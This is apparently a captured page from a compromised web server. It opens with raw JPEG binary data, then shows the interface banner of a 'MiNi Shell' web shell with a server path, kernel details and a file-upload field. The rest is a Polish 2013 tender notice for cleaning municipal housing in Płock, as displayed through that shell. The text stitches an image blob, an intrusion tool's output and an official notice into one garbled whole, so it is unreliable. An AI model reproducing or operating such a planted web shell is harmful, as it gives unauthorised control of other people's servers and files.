JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131212/516900-N-2013.html

<p class="kh_header"><b>Płock: Utrzymanie porządku i czystości wewnątrz budynków i pomieszczeń biurowych oraz na przyległych terenach przydomowych i osiedlowych, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku</b><br>
<b>Numer ogłoszenia: 516900 - 2013; data zamieszczenia: 12.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 24 3640310, faks 24 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością ze 100% udziałem Gminy Miasto Płock.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie porządku i czystości wewnątrz budynków i pomieszczeń biurowych oraz na przyległych terenach przydomowych i osiedlowych, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie od 01 stycznia 2014 do 31 grudnia 2014 usługi w zakresie utrzymania porządku i czystości wewnątrz budynków i pomieszczeń biurowych oraz na przyległych terenach przydomowych i osiedlowych, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o.  w Płocku. Przedmiot zamówienia obejmuje dwie części:
Część I: Utrzymanie porządku i czystości wewnątrz budynków i pomieszczeń biurowych oraz na przyległych terenach przydomowych i osiedlowych, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku (bez budynku i terenu przyległego przy ul. Polnej 7).
Część II: Utrzymanie porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 oraz na przyległym terenie, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej - TBS Sp.  z o. o. w  Płocku.
Szczegółowy zakres prac - Część I: Utrzymanie porządku i czystości wewnątrz budynków i pomieszczeń biurowych oraz na przyległych terenach przydomowych i osiedlowych, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku (bez budynku i terenu przyległego przy ul. Polnej 7).
Zakres prac będących przedmiotem zamówienia rozliczanych stawką ryczałtową za 1 m2 powierzchni obejmuje w szczególności:

a. Utrzymanie porządku  i czystości wewnątrz budynków:
Uwaga: Usługa będzie wykonywana od poniedziałku do piątku każdego tygodnia a w pozostałe dni tygodnia (w tym święta) po otrzymaniu telefonicznego zgłoszenia od administratora

1. Codzienne sprzątanie klatek schodowych, podestów, korytarzy, schodów wejściowych do budynków - zamiatanie (również pod wycieraczkami - powierzchnia ujęta w wykazach), zbieranie odpadów i miejscowe zmywanie, usuwanie pajęczyn oraz (w uzgodnieniu z ROM) nieaktualnych ogłoszeń i ulotek reklamowych.
2. Mycie raz w miesiącu: drzwi wejściowych do budynku, klatki schodowej, balustrad schodowych oraz tablic informacyjnych, skrzynek umieszczonych wewnątrz i na zewnątrz budynku. 
3. Mycie minimum dwa razy do roku kloszy na klatkach schodowych.
b. Utrzymanie porządku i czystości na terenach przydomowych i osiedlowych:
1. Codzienne sprzątanie chodnika wzdłuż budynku, dojść do budynku, do śmietnika i innych powierzchni utwardzonych oraz terenów zielonych.
2. Codzienne sprzątanie altan śmietnikowych i terenu wokół altan śmietnikowych, wolnostojących pojemników lub kontenerów oraz pojemników do selektywnej zbiórki odpadów komunalnych z odpadów.
3. Codzienne kontrolowanie wypełnienia pojemników na nieczystości stałe, segregowane oraz podejmowanie działań zmierzających do efektywnego gromadzenia tych nieczystości poprzez przegarnianie i ubijanie w pojemnikach,
4. Systematyczne usuwanie chwastów przy opaskach budynków i ciągach komunikacyjnych z wywiezieniem i utylizacją,
5. Systematyczne usuwanie zgrabianych liści z terenów zewnętrznych (również przy żywopłotach) z wywiezieniem i utylizacją.
6. Usuwanie śniegu z ciągów komunikacyjnych* do godz. 6 rano (opad nocny) oraz w ciągu 3 godzin od ustania opadów (opad dzienny). Usuwanie śniegu należy przeprowadzić na całej szerokości ciągów komunikacyjnych. Zapobieganie skutkom gołoledzi poprzez posypywanie ciągów 
komunikacyjnych należących do nieruchomości, zakupionym i dowiezionym na koszt własny piaskiem bądź skuwanie miejsc oblodzonych oraz stałe utrzymywanie drożności odpływu z chodników wody z topniejącego śniegu i lodu.
Objaśnienia:
* Przez ciągi komunikacyjne rozumie się: chodniki, dojścia, podesty i schody wejściowe do klatek schodowych, dojścia do altan śmietnikowych, parkingi i dojazdy do nich, miejsca postojowe, przejazdy między kompleksami garaży oraz uliczki osiedlowe.

c. Współpraca z administracją (z Rejonem Obsługi Mieszkańców)

1. Rozwieszanie na klatkach schodowych budynków zatwierdzonych miesięcznych harmonogramów utrzymania porządku i czystości wewnątrz budynku.
2. Niezwłoczne zawiadamianie o dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji i urządzeń technicznych oraz o przypadkach dewastacji i naruszania przez mieszkańców regulaminu porządku domowego,
3. Wywieszanie flag w dniach uroczystości państwowych oraz ich zdejmowanie,
4. Niezwłoczne doręczanie korespondencji otrzymanej od Rejonu Obsługi Mieszkańców do lokali znajdujących się w budynkach wykazanych w Załącznikach wg zasady: Wykonawca dwukrotnie podejmuje próbę doręczenia korespondencji. W przypadku braku lokatora lub odmowy złożenia podpisu na wykazie doręczeń lub kopii pisma roznoszący dokonuje zapisu: brak lokatora, data...godz...- podpis czytelny osoby roznoszącej; lokator odmówił podpisu data...godz...- podpis czytelny osoby roznoszącej.
5. Przekazanie Zamawiającemu danych kontaktowych Wykonawcy w celu umożliwienia mieszkańcom i użytkownikom budynków zgłoszeń w przypadkach nie wywiązywania się z w/w zakresu.
6. Wywieszanie na klatkach schodowych nazwy firmy sprzątającej oraz danych teleadresowych Wykonawcy. 

d. Utrzymanie porządku i czystości w pomieszczeniach biurowych.

Uwaga: Usługa będzie wykonywana w dni robocze od godz. 1530

1. Czynności wykonywane codziennie:

a) zmywanie na mokro podłóg przy użyciu środków czyszczących i bieżąca konserwacja
powłok,
b) wycieranie kurzu z mebli i urządzeń biurowych (komputery wraz z klawiaturą + drukarki +
aparaty telefoniczne) oraz z parapetów,
c) usuwanie śmieci, czyszczenie koszy i wymiana worków - zakupionych i dowiezionych na koszt własny, czyszczenie koszy,
d) mycie luster,
e) czyszczenie pomieszczeń i armatury sanitarnej,
f) uzupełnienie środków czystości - zakupionych i dowiezionych na koszt własny -  w toaletach (papier toaletowy biały, mydło w płynie, kostki dezynfekujące do muszli),

2.    Czynności wykonywane raz w tygodniu:

a)    dezynfekcja urządzeń sanitarnych i armatury.

3. Czynności wykonywane raz w miesiącu:

a) wycieranie kurzu z kontaktów prądu i wyłączników oświetlenia,
b) mycie drzwi wejściowych, drzwi wewnętrznych i futryn, 
c) odkurzanie tapicerki mebli,
d) mycie glazury i lamperii w pomieszczeniach sanitarnych i szczegółowa ich dezynfekcja,
 4. Czynności wykonywane minimum dwa razy do roku:
       a)   mycie okien oraz powierzchni przeszklonych wewnątrz pomieszczeń biurowych,
       b)   mycie grzejników.
         
     5. Na wezwanie Zamawiającego, 0,5 h serwis wewnątrz budynku w godz. 1000 -  1200,  w okresie jesienno - zimowym: styczeń - marzec, październik - grudzień.
 
	Integralną częścią przedmiotu zamówienia jest -Wykaz budynków i terenów , w których wykonywana będzie przedmiotowa usługa:

Wykaz budynków i terenów - ROM III		- Załącznik Nr 10
Wykaz budynków i terenów - ROM IV		- Załącznik Nr 11
Wykaz budynków i terenów - ROM V		- Załącznik Nr 12
Wykaz altan śmietnikowych			- Załącznik Nr 15

	Łączna rzeczywista powierzchnia do sprzątania w budynkach - 582,79 m2, łączna powierzchnia w budynkach po przeliczeniu przez współczynniki korygujące -   566,49 m2.
	Łączna rzeczywista powierzchnia do sprzątania terenów przyległych - 14 135,60 m2, łączna powierzchnia terenów przyległych po przeliczeniu przez współczynniki korygujące  -   8 320,37 m2.
	Łączna ilość altan śmietnikowych -  szt. 2
	Ogółem rzeczywista powierzchnia do sprzątania:  14 718,39  m2.
	Ogółem powierzchnia skorygowana o współczynniki określone w Załączniku Nr 14 pn. Tabela współczynników korygujących:   8 886,86   m2.

Uwaga: powierzchnia skorygowana o współczynniki określone w w/w Załączniku jest  podstawą do określenia ceny 1 m2 wskazanego w ofercie.

	Do realizacji przedmiotowej usługi w ramach poszczególnych ROM - ów, Wykonawca musi dysponować niżej wymienioną ilością osób:
				
1. ROM III	co najmniej   1  osoba				
2. ROM IV	co najmniej   2  osoby		
3. ROM V	co najmniej   3  osoby

Łącznie: co najmniej 6 osób.

Zamawiający wymaga dodatkowo, by Wykonawca dysponował 1 osobą do nadzoru.

Szczegółowy zakres prac - Część II: Utrzymanie porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 oraz na przyległym terenie, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej - TBS Sp.  z o. o. w  Płocku.

Zakres prac będących przedmiotem zamówienia rozliczanych stawką ryczałtową za 1 m2 powierzchni obejmuje w szczególności:

a.  Utrzymanie porządku i czystości wewnątrz budynku:

Uwaga: Usługa będzie wykonywana w dni robocze od godz. 1530

1. Czynności wykonywane codziennie:
a) zmywanie na mokro podłóg przy użyciu środków czyszczących i bieżąca konserwacja powłok,
b) odkurzanie wykładzin dywanowych, 
c) wycieranie kurzu z mebli i urządzeń biurowych (komputery wraz z klawiaturą + drukarki + aparaty telefoniczne) oraz z parapetów,

d) usuwanie śmieci i wymiana worków - zakupionych i dowiezionych na koszt własny, czyszczenie koszy,
e) mycie luster,
f) czyszczenie pomieszczeń sanitarnych i armatury,
g) uzupełnienie środków czystości - zakupionych i dowiezionych na koszt własny - w toaletach (papier toaletowy biały, mydło w płynie, kostki dezynfekujące do muszli),
h) mycie naczyń znajdujących się w sekretariacie, 

      2.  Czynności wykonywane raz w tygodniu:

      a)  dezynfekcja urządzeń sanitarnych i armatury.

      3.  Czynności wykonywane raz w miesiącu:
a) wycieranie kurzu z kontaktów prądu i wyłączników oświetlenia,
b) mycie drzwi wejściowych, drzwi wewnętrznych i futryn, 
c) odkurzanie tapicerki mebli,
d) mycie glazury w pomieszczeniach sanitarnych i szczegółowa ich dezynfekcja,
e) gruntowne mycie i konserwacja podłóg z tworzywa sztucznego środkami z domieszką akrylanów, 
f) odkurzanie wszystkich sprzętów znajdujących się na korytarzach jak gabloty, obrazy, gaśnice p.poż. i inne.
g) czyszczenie balustrad,

       4.  Czynności wykonywane raz na kwartał:

a) maszynowe czyszczenie powierzchni podłóg z tworzywa sztucznego wraz z wymianą powłoki akrylowanej oraz utwardzaniem powierzchni akrylowych w wysokiej temperaturze metodą polerowania high speed,
b) mycie paneli ściennych,

      5.  Czynności wykonywane minimum dwa razy w roku:

a) mycie okien oraz powierzchni przeszklonych wewnątrz pomieszczeń biurowych,
b) mycie grzejników.

    6. Na wezwanie Zamawiającego, 0,5 h serwis wewnątrz budynku w godz. 1000 -  1200,  w okresie jesienno - zimowym: styczeń - marzec, październik - grudzień.
 
b.  Utrzymanie porządku i czystości na przyległym terenie do budynku przy ul.  Polnej 7:

1. Codzienne sprzątanie śmieci z ogrodzonego terenu i dojścia do budynku,
2. Codzienne opróżnianie kosza na śmieci zlokalizowanego przed budynkiem,
3. Systematyczne usuwanie chwastów z terenu utwardzonego wokół budynku do ogrodzenia oraz na całej długości chodnika wzdłuż ogrodzenia.
4. Raz w tygodniu pozamiatanie terenu utwardzonego do ogrodzenia,
5. W okresie jesiennym raz w tygodniu zgrabienie liści z ogrodzonego terenu wokół budynku wraz z wywiezieniem i utylizacją.

c. Utrzymanie porządku i czystości na przyległym terenie do budynku przy ul. Polnej 7 w okresie   zimowym.
1. Usuwanie śniegu z ciągów komunikacyjnych terenu ogrodzonego, utwardzonego oraz na całej długości chodnika wzdłuż ogrodzenia: do godz. 700 rano (opad nocny) oraz w ciągu 3 godzin od ustania opadów (opad dzienny) do godz. 1530  w następujące dni tygodnia: poniedziałek, wtorek, środa, piątek oraz do godz. 1730 w czwartek.
2. Usuwanie śniegu (bez jego wywozu) należy przeprowadzić na całej szerokości ciągów komunikacyjnych. 
3. Zapobieganie skutkom gołoledzi poprzez posypywanie chodnika, dojścia do budynku, dojścia do pojemnika na śmieci, parkingu i dojazdu do niego zakupionym i dowiezionym na koszt własny piaskiem, skuwanie miejsc oblodzonych oraz stałe utrzymanie drożności odpływu z chodnika, parkingu i powierzchni utwardzonej wody z topniejącego śniegu i lodu.

	Łączna rzeczywista powierzchnia do utrzymania porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 - 952,78 m2, łączna powierzchnia do utrzymania porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 po przeliczeniu przez współczynniki korygujące - 808,29 m2.
	Łączna rzeczywista powierzchnia do  utrzymania porządku i czystości terenu przyległego - 934,56 m2, łączna powierzchnia terenu przyległego po przeliczeniu przez współczynniki korygujące  - 507,30 m2,           w tym pow. utwardzona wraz z chodnikiem: 471,81 m2 oraz pow. terenu zielonego wraz z trawnikiem: 35,49  m2.
Integralną częścią przedmiotu zamówienia jest Wykaz pomieszczeń biurowych budynku przy ul. Polnej 7 oraz przyległego do budynku terenu, stanowiących zasób własny MZGM-TBS Sp. z o.o. w Płocku Załącznik Nr 16.
Uwaga: powierzchnia skorygowana o współczynniki określone w  Załączniku Nr 14 jest  podstawą do określenia ceny 1 m2 wskazanego w ofercie.

	Do realizacji przedmiotowej usługi Wykonawca musi dysponować co najmniej 1 osobą		


Na każdą Część zamówienia z Wykonawcą zostanie zawarta odrębna umowa..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Część I Utrzymanie porządku i czystości wewnątrz budynków i pomieszczeń biurowych oraz na przyległych terenach przydomowych i osiedlowych, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku (bez budynku i terenu przyległego przy ul. Polnej 7)- 20 % zamówienia podstawowego
Część II Utrzymanie porządku i czystości wewnątrz pomieszczeń biurowych w budynku przy ulicy Polnej 7 oraz na przyległym terenie, w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, stanowiących własność Miejskiego Zakładu Gospodarki Mieszkaniowej - TBS Sp.  z o. o. w  Płocku - 20% zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.91.00-3, 90.91.92.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do  przetargu jest zobowiązany wnieść wadium w wysokości:
na Część I 	             	 - 1 500,00 złotych (słownie: tysiąc pięćset złotych)
na Część II  			-     600,00 złotych (słownie: sześćset złotych)
Łącznie wadium dla dwóch części : 2.100,00 złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia w trybie at.44 w związku z art. 22 ust.1Pzp
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 usługi polegające na wykonywaniu usług: w zakresie sprzątania powierzchni wewnętrznych obiektów o charakterze biurowym lub w zakresie sprzątania wewnątrz budynków oraz o wartości co najmniej 30 000,00 zł brutto każda - dotyczy Części I
b) Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 usługi polegające na wykonywaniu usług w zakresie sprzątania powierzchni wewnętrznych obiektów o charakterze biurowym oraz  o wartości co najmniej 15 000,00 zł brutto każda - dotyczy Części II
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia w trybie at.44 w związku z art. 22 ust.1Pzp
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje:
Część I:
a) ROM III co najmniej 1 osobą zdolną do wykonywania zamówienia,
b) ROM IV co najmniej 2 osobami zdolnymi do wykonania zamówienia,
c) ROM V co  najmniej 3 osobami zdolnymi do wykonania zamówienia,
d)Zamawiający wymaga dodatkowo, by Wykonawca dysponował 1 osobą do nadzoru.
Część II:
e) co najmniej 1 osobą  zdolną do wykonywania zamówienia.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłacona polisa na kwotę nie niższą niż cena oferty, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - dotyczy Części I i Części II. 
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

